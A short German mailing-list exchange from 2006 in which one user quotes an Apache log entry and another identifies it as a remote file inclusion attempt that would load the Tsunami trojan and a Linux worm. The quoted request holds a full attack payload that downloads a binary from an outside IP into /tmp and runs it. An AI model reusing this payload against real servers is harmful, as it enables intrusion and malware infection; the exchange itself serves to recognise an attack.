Hi Klaus, Klaus Wieland <[EMAIL PROTECTED]> wrote: >in den Kontext passt, dass in meinem Apache Log solche Einträge zu >finden sind: > >66.229.32.56 - - [08/Jun/2006:12:33:18 +0200] "GET >/index2.php?option=com_content&do_pdf=1&id=1index2. >php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195. >161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| > HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows > NT >5.1;)" "-" > >Das sieht nicht freundlich aus ...
Ist es auch nicht. Das würde (entsprechende Lücke vorausgesetzt) Trojan.Tsunami.B und Worm.Linux.Mare.D nachladen. Frank -- 21 is only half the truth
